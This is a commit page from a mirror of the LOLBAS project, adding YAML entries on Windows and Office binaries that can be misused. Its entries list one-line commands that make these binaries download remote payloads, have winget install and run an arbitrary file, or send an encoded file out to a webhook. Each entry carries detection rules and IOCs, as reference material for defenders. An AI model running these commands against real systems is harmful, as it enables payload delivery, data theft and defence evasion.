public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 23:37:58 +01:00
Code Issues Projects Releases Wiki Activity

Merge branch 'master' into windows_11_sprint

Browse Source
This commit is contained in:
Wietze 2022-10-04 12:31:31 +01:00 committed by GitHub
commit 76acca6f2b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11 changed files with 175 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitattributes vendored Normal file
View File

@ -0,0 +1 @@
*.yml text eol=lf

5
.github/workflows/yaml-linting.yml vendored
View File

@ -13,6 +13,11 @@ jobs:
no_warnings: true no_warnings: true
file_or_dir: yml/**/*.yml file_or_dir: yml/**/*.yml
config_file: .github/.yamllint config_file: .github/.yamllint
- name: Validate Template Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: YML-Template.yml
schema: YML-Schema.yml
- name: Validate OSBinaries YAML Schema - name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix uses: cketti/action-pykwalify@v0.3-temp-fix
with: with:

18
YML-Template.yml
View File

@ -4,12 +4,10 @@ Description: Something general about the binary
Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality, Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality,
- Alias: Binary64.exe # but for example, is built for different architecture. - Alias: Binary64.exe # but for example, is built for different architecture.
Author: The name of the person that created this file Author: The name of the person that created this file
Created: YYYY-MM-DD (date the person created this file) Created: 1970-01-01 # YYYY-MM-DD (date the person created this file)
Commands: Commands:
- Command: The command - Command: The command
Description: Description of the command Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase Usecase: A description of the usecase
Category: Execute Category: Execute
Privileges: Required privs Privileges: Required privs
@ -26,19 +24,19 @@ Full_Path:
- Path: c:\windows\system32\bin.exe - Path: c:\windows\system32\bin.exe
- Path: c:\windows\syswow64\bin.exe - Path: c:\windows\syswow64\bin.exe
Code_Sample: Code_Sample:
- Code: http://url.com/git.txt - Code: http://example.com/git.txt
Detection: Detection:
- IOC: Event ID 10 - IOC: Event ID 10
- IOC: binary.exe spawned - IOC: binary.exe spawned
- Analysis: https://link/to/blog/gist/writeup/if/applicable - Analysis: https://example.com/to/blog/gist/writeup/if/applicable
- Sigma: https://link/to/sigma/rule/if/applicable - Sigma: https://example.com/to/sigma/rule/if/applicable
- Elastic: https://link/to/elastic/rule/if/applicable - Elastic: https://example.com/to/elastic/rule/if/applicable
- Splunk: https://link/to/splunk/rule/if/applicable - Splunk: https://example.com/to/splunk/rule/if/applicable
- BlockRule: https://link/to/microsoft/block/rules/if/applicable - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable
Resources: Resources:
- Link: http://blogpost.com - Link: http://blogpost.com
- Link: http://twitter.com/something - Link: http://twitter.com/something
- Link: Threatintelreport... - Link: http://example.com/Threatintelreport
Acknowledgement: Acknowledgement:
- Person: John Doe - Person: John Doe
Handle: '@johndoe' Handle: '@johndoe'

12
yml/OSBinaries/ConfigSecurityPolicy.yml
View File

@ -1,7 +1,7 @@
--- ---
Name: ConfigSecurityPolicy.exe Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira' Author: Ialle Teixeira
Created: 2020-09-04 Created: 2020-09-04
Commands: Commands:
- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
@ -11,7 +11,15 @@ Commands:
Privileges: User Privileges: User
MitreID: T1567 MitreID: T1567
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Code_Sample: Code_Sample:
- Code: - Code:
@ -29,3 +37,5 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'

13
yml/OSBinaries/Installutil.yml
View File

@ -1,7 +1,7 @@
--- ---
Name: Installutil.exe Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe' Author: Oddvar Moe
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
@ -18,13 +18,18 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
@ -39,3 +44,5 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'

11
yml/OSBinaries/Mshta.yml
View File

@ -1,7 +1,7 @@
--- ---
Name: Mshta.exe Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta) Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe' Author: Oddvar Moe
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
- Command: mshta.exe evilfile.hta - Command: mshta.exe evilfile.hta
@ -32,6 +32,13 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
- Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe
@ -69,3 +76,5 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'

13
yml/OSBinaries/Presentationhost.yml
View File

@ -1,7 +1,7 @@
--- ---
Name: Presentationhost.exe Name: Presentationhost.exe
Description: File is used for executing Browser applications Description: File is used for executing Browser applications
Author: 'Oddvar Moe' Author: Oddvar Moe
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap - Command: Presentationhost.exe C:\temp\Evil.xbap
@ -11,11 +11,16 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml
- IOC: Execution of .xbap files may not be common on production workstations - IOC: Execution of .xbap files may not be common on production workstations
@ -25,3 +30,5 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'

28
yml/OSBinaries/Winget.yml Normal file
View File

@ -0,0 +1,28 @@
---
Name: winget.exe
Description: Windows Package Manager tool
Author: Paul Sanders
Created: 2022-01-03
Commands:
- Command: winget.exe install --manifest manifest.yml
Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"'
Usecase: Download and execute an arbitrary file from the internet
Category: Execute
Privileges: Local Aministrator - required to enabled local manifest setting
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe
Code_Sample:
- Code: https://gist.github.com/saulpanders/00e1177602a8c01a3a8bfa932b3886b0
Detection:
- IOC: winget.exe spawned with local manifest file
- IOC: Sysmon Event ID 1 - Process Creation
- Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html
- Sigma: https://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml
Resources:
- Link: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html
- Link: https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended
Acknowledgement:
- Person: Paul
Handle: '@saulpanders'

34
yml/OtherMSBinaries/MsoHtmEd.yml Normal file
View File

@ -0,0 +1,34 @@
---
Name: MsoHtmEd.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'

31
yml/OtherMSBinaries/Mspub.yml Normal file
View File

@ -0,0 +1,31 @@
---
Name: Mspub.exe
Description: Microsoft Publisher
Author: Nir Chako
Created: 2022-08-02
Commands:
- Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'

27
yml/OtherMSBinaries/ProtocolHandler.yml Normal file
View File

@ -0,0 +1,27 @@
---
Name: ProtocolHandler.exe
Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: ProtocolHandler.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
- Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
- Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Detection:
- IOC: Suspicious Office application Internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'